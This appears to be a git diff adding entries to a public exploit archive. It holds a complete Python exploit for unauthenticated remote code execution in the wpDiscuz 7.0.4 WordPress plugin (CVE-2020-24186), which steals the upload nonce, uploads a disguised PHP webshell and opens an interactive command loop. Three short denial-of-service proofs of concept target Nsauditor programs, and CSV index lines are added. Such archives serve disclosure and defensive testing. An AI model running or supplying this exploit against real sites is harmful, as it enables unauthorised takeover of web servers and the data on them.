diff --git a/exploits/php/webapps/49967.py b/exploits/php/webapps/49967.py new file mode 100755 index 000000000..ccf74e595 --- /dev/null +++ b/exploits/php/webapps/49967.py @@ -0,0 +1,126 @@ +# Exploit Title: WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticated) +# Date: 2021/06/08 +# Exploit Author: Fellipe Oliveira +# Vendor Homepage: https://gvectors.com/ +# Software Link: https://downloads.wordpress.org/plugin/wpdiscuz.7.0.4.zip +# Version: wpDiscuz 7.0.4 +# Tested on: Debian9, Windows 7, Windows 10 (Wordpress 5.7.2) +# CVE : CVE-2020-24186 +# Thanks for the great contribution to the code: Z3roC00l (https://twitter.com/zeroc00I) + +#!/bin/python3 + +import requests +import optparse +import re +import random +import time +import string +import json + +parser = optparse.OptionParser() +parser.add_option('-u', '--url', action="store", dest="url", help="Base target host: http://192.168.1.81/blog") +parser.add_option('-p', '--path', action="store", dest="path", help="Path to exploitation: /2021/06/blogpost") + + +options, args = parser.parse_args() + +if not options.url or not options.path: + print('[+] Specify an url target') + print('[+] Example usage: exploit.py -u http://192.168.1.81/blog -p /wordpress/2021/06/blogpost') + print('[+] Example help usage: exploit.py -h') + exit() + +session = requests.Session() + +main_url = options.url +path = options.path +url_blog = main_url + path +clean_host = main_url.replace('http://', '').replace('/wordpress','') + +def banner(): + print('---------------------------------------------------------------') + print('[-] Wordpress Plugin wpDiscuz 7.0.4 - Remote Code Execution') + print('[-] File Upload Bypass Vulnerability - PHP Webshell Upload') + print('[-] CVE: CVE-2020-24186') + print('[-] https://github.com/hevox') + print('--------------------------------------------------------------- \n') + +def csrfRequest(): + global wmuSec + global wc_post_id + + try: + get_html = session.get(url_blog) + response_len = str(len(get_html.text)) + response_code = str(get_html.status_code) + print('[+] Response length:['+response_len+'] | code:['+response_code+']') + + raw_wmu = get_html.text.replace(',','\n') + wmuSec = re.findall('wmuSecurity.*$',raw_wmu,re.MULTILINE)[0].split('"')[2] + print('[!] Got wmuSecurity value: '+ wmuSec +'') + raw_postID = get_html.text.replace(',','\n') + wc_post_id = re.findall('wc_post_id.*$',raw_postID,re.MULTILINE)[0].split('"')[2] + print('[!] Got wmuSecurity value: '+ wc_post_id +' \n') + + except requests.exceptions.ConnectionError as err: + print('\n[x] Failed to Connect in: '+url_blog+' ') + print('[x] This host seems to be Down') + exit() + + +def nameRandom(): + global shell_name + print('[+] Generating random name for Webshell...') + shell_name = ''.join((random.choice(string.ascii_lowercase) for x in range(15))) + time.sleep(1) + print('[!] Generated webshell name: '+shell_name+'\n') + + return shell_name + + +def shell_upload(): + global shell + print('[!] Trying to Upload Webshell..') + try: + upload_url = main_url + "/wp-admin/admin-ajax.php" + upload_cookies = {"wordpress_test_cookie": "WP%20Cookie%20check", "wpdiscuz_hide_bubble_hint": "1"} + upload_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "*/*", "Accept-Language": "pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------2032192841253859011643762941", "Origin": "http://"+clean_host+"", "Connection": "close", "Referer": url_blog} + upload_data = "-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nwmuUploadFiles\r\n-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"wmu_nonce\"\r\n\r\n"+wmuSec+"\r\n-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"wmuAttachmentsData\"\r\n\r\n\r\n-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"wmu_files[0]\"; filename=\""+shell_name+".php\"\r\nContent-Type: image/png\r\n\r\nGIF689a;\r\n\r\n\r\n\x1a\x82\r\n-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"postId\"\r\n\r\n"+wc_post_id+"\r\n-----------------------------2032192841253859011643762941--\r\n" + check = session.post(upload_url, headers=upload_headers, cookies=upload_cookies, data=upload_data) + json_object = (json.loads(check.text)) + status = (json_object["success"]) + + get_path = (check.text.replace(',','\n')) + shell_pret = re.findall('url.*$',get_path,re.MULTILINE) + find_shell = str(shell_pret) + raw = (find_shell.replace('\\','').replace('url":"','').replace('\',','').replace('"','').replace('[\'','')) + shell = (raw.split(" ",1)[0]) + + if status == True: + print('[+] Upload Success... Webshell path:' +shell+' \n') + else: + print('[x] Failed to Upload Webshell in: '+ url_blog +' ') + exit() + + except requests.exceptions.HTTPError as conn: + print('[x] Failed to Upload Webshell in: '+ url_blog +' ') + + return shell + + +def code_exec(): + try: + while True: + cmd = input('> ') + codex = session.get(shell + '?cmd='+cmd+'') + print(codex.text.replace('GIF689a;','').replace('�','')) + except: + print('\n[x] Failed to execute PHP code...') + + +banner() +csrfRequest() +nameRandom() +shell_upload() +code_exec() \ No newline at end of file diff --git a/exploits/windows/dos/49964.py b/exploits/windows/dos/49964.py new file mode 100755 index 000000000..bf5d035b0 --- /dev/null +++ b/exploits/windows/dos/49964.py @@ -0,0 +1,20 @@ +# Exploit Title: NBMonitor 1.6.8 - Denial of Service (PoC) +# Date: 07/06/2021 +# Author: Erick Galindo +# Vendor Homepage: http://www.nsauditor.com +# Software Link: http://www.nbmonitor.com/downloads/nbmonitor_setup.exe +# Version: 1.6.8 +# Tested on: Windows 10 Pro x64 es + +# Proof of Concept: +#1.- Copy printed "AAAAA..." string to clipboard! +#2.- Go to Register > Enter Registration Code... +#3.- Write anything in 'Name' field +#4.- Paste clipboard in 'Key' field +#5.- Click on button -> Ok + +buffer = "\x41" * 256 + +f = open ("NBM.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/49965.py b/exploits/windows/dos/49965.py new file mode 100755 index 000000000..cedc725f3 --- /dev/null +++ b/exploits/windows/dos/49965.py @@ -0,0 +1,21 @@ +# Exploit Title: Nsauditor 3.2.3 - Denial of Service (PoC) +# Date: 07/06/2021 +# Author: Erick Galindo +# Vendor Homepage: http://www.nsauditor.com +# Software http://www.nsauditor.com/downloads/nsauditor_setup.exe +# Version: 3.2.3.0 +# Tested on: Windows 10 Pro x64 es + +# Proof of Concept: +#1.- Copy printed "AAAAA..." string to clipboard! +#2.- Open Nsauditor.exe +#3.- Go to Register > Enter Registration Code... +#4.- Write anything in 'Name' field +#5.- Paste clipboard in 'Key' field +#6.- Click on button -> Ok + +buffer = "\x41" * 256 + +f = open ("NBM.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/local/49966.py b/exploits/windows/local/49966.py new file mode 100755 index 000000000..35de5e1ce --- /dev/null +++ b/exploits/windows/local/49966.py @@ -0,0 +1,21 @@ +# Exploit Title: Backup Key Recovery 2.2.7 - Denial of Service (PoC) +# Date: 07/06/2021 +# Author: Erick Galindo +# Vendor Homepage: http://www.nsauditor.com +# Software http://www.nsauditor.com/downloads/backeyrecovery_setup.exe +# Version: 2.2.7.0 +# Tested on: Windows 10 Pro x64 es + +# Proof of Concept: +#1.- Copy printed "AAAAA..." string to clipboard! +#2.- Open BackupKeyRecovery.exe +#3.- Go to Register > Enter Registration Code... +#4.- Write anything in 'Name' field +#5.- Paste clipboard in 'Key' field +#6.- Click on button -> Ok + +buffer = "\x41" * 256 + +f = open ("poc.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 8757be0ce..a0e6960d4 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6794,6 +6794,8 @@ id,file,description,date,author,type,platform,port 49953,exploits/ios/dos/49953.py,"Macaron Notes great notebook 5.5 - Denial of Service (PoC)",2021-06-04,"Geovanni Ruiz",dos,ios, 49954,exploits/ios/dos/49954.py,"My Notes Safe 5.3 - Denial of Service (PoC)",2021-06-04,"Geovanni Ruiz",dos,ios, 49957,exploits/ios/dos/49957.py,"Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC)",2021-06-07,"Geovanni Ruiz",dos,ios, +49964,exploits/windows/dos/49964.py,"NBMonitor 1.6.8 - Denial of Service (PoC)",2021-06-08,"Erick Galindo",dos,windows, +49965,exploits/windows/dos/49965.py,"Nsauditor 3.2.3 - Denial of Service (PoC)",2021-06-08,"Erick Galindo",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -11352,6 +11354,7 @@ id,file,description,date,author,type,platform,port 49925,exploits/windows/local/49925.txt,"Veyon 4.4.1 - 'VeyonService' Unquoted Service Path",2021-06-01,"Víctor García",local,windows, 49929,exploits/windows/local/49929.txt,"Intel(R) Audio Service x64 01.00.1080.0 - 'IntelAudioService' Unquoted Service Path",2021-06-02,"Geovanni Ruiz",local,windows, 49959,exploits/windows/local/49959.py,"IcoFX 2.6 - '.ico' Buffer Overflow SEH + DEP Bypass using JOP",2021-06-07,"Austin Babcock",local,windows, +49966,exploits/windows/local/49966.py,"Backup Key Recovery 2.2.7 - Denial of Service (PoC)",2021-06-08,"Erick Galindo",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -44120,3 +44123,4 @@ id,file,description,date,author,type,platform,port 49960,exploits/linux/webapps/49960.py,"Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated)",2021-06-07,enox,webapps,linux, 49961,exploits/php/webapps/49961.py,"Grav CMS 1.7.10 - Server-Side Template Injection (SSTI) (Authenticated)",2021-06-07,enox,webapps,php, 49962,exploits/php/webapps/49962.sh,"Wordpress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unauthenticated)",2021-06-07,UnD3sc0n0c1d0,webapps,php, +49967,exploits/php/webapps/49967.py,"WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticated)",2021-06-08,"Fellipe Oliveira",webapps,php,